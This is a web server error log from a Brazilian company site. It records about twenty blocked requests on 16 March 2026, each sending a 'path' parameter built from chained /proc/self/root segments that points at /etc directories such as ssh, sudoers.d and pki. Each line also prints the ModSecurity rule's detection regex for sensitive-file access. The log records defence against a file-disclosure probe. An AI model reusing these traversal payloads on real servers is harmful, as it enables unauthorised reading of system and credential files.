[Mon Mar 16 12:36:42.084905 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.241.46:57296] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjirysWC90G-1nBrBERwAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:44.418372 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:57300] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjjP9ocpUE4ed4uDzubgAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:46.845823 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:57314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjjbABkC4fWIHEf8HpfQAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:48.239380 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:35084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjkHjZBu2q05ozVU9XCwAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:49.002349 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:53466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjkdSswJuvopo3lOhdoQAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:49.394530 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.241.46:35094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjkXjZBu2q05ozVU9XDAAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:50.702901 2026] [:error] [pid 11972:tid 140411691570944] [client 74.7.241.46:35100] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjkpqj1wV0Si-OkefszwAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:51.331156 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:55584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjk5qj1wV0Si-Okefs0AAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:51.859195 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.241.46:35108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjk46lpbStxTqkSktrXQAAAkw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:52.637326 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:55588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjlI6lpbStxTqkSktrXgAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:53.136158 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:35112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjlZqj1wV0Si-Okefs0QAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:55.063151 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.243.203:55604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjlxXjF1vJNtV6CWr02QAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:55.379555 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:35122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjl5qj1wV0Si-Okefs1AAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:36:56.699236 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:35134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjmLABkC4fWIHEf8HpgQAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:01.178931 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.241.46:35144] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjnXbQATo66fKoS7xORAAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:03.997984 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.241.46:54072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjnnbQATo66fKoS7xORwAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:05.330960 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.241.46:54080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjoRXjF1vJNtV6CWr02gAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:06.557526 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.241.46:54094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjorysWC90G-1nBrBESwAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:07.733886 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.241.46:54110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjo46lpbStxTqkSktrYQAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:08.943773 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:36588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjpI6lpbStxTqkSktrYwAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:09.350608 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:55612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjpQlT9VtDQc7bgUywfgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:10.088021 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:36590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjprABkC4fWIHEf8HphAAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:37:15.661801 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:36606] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgjq7ysWC90G-1nBrBEUQAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
